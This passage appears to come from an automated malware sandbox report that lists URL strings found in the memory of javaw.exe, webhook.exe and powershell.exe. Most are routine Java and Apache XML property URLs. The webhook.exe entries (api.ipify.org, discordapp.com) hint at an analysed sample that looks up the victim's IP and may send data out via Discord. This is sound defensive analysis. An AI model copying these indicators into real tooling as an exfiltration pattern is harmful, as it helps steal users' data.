Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvispa
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclnA
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueang/IllB
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checking
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingva/lanB
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefutil/SD
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefniti:
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/w3c/d
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-nodeU
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryDocu:
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner/w3c/d7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor/5
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerm/l8
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver:
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableQ
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-managersetBF
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factoryam7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtde:
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handlerm
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handlermPrm
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/locale
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/localedJ
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationetPubl?
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationdK
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declaration
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationsion
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definition
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitionr(
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/w3c/domD
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypesk
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: javaw.exe, 00000005.00000002.3694422563.00000000099DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: powershell.exe, 00000008.00000002.1875355279.0000000002A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://discordapp.com
Source: webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://discordapp.comd
Source: webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: javaw.exe, 00000005.00000002.3694422563.00000000099DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/jaxp/xpath/dom
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/jaxp/xpath/dom2
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
